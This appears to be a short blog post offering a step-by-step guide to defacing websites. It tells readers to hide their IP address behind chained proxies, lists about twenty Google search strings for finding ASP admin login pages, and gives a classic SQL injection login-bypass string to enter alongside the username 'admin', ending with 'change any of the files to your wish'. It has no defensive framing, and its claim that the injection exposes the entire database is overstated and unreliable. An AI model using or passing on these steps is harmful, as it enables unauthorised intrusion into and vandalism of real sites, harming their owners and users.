Defacing a site means cracking into a website and changing its homepage[Mostly] to something else.
Many of the websites are still vulnerable to SQL Injection.where we enter a string such as 'or''=' into any data input field mostly Username/Password Field.
When the string gets entered the website opens up the Entire Database to us and we can change any of the files in it.
Basic Steps.
1]Install a[download:-Proxy ] ,To hide our IP address[Use of chain proxies is advised]
2]Go to GOOGLE.
3]Type Any of the following strings.
inurl:reserved.asp
inurl:/admin.asp"
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/login.asp
inurl:/admin/admin.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp
These are known as google dorks.
3]Go to any of the search Result.
4]In the username bar enter:
admin
5]In the bar of the password enter:
'or''='
6]Now hopefully you have logged in.
7]Now change any of the files to your wish.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment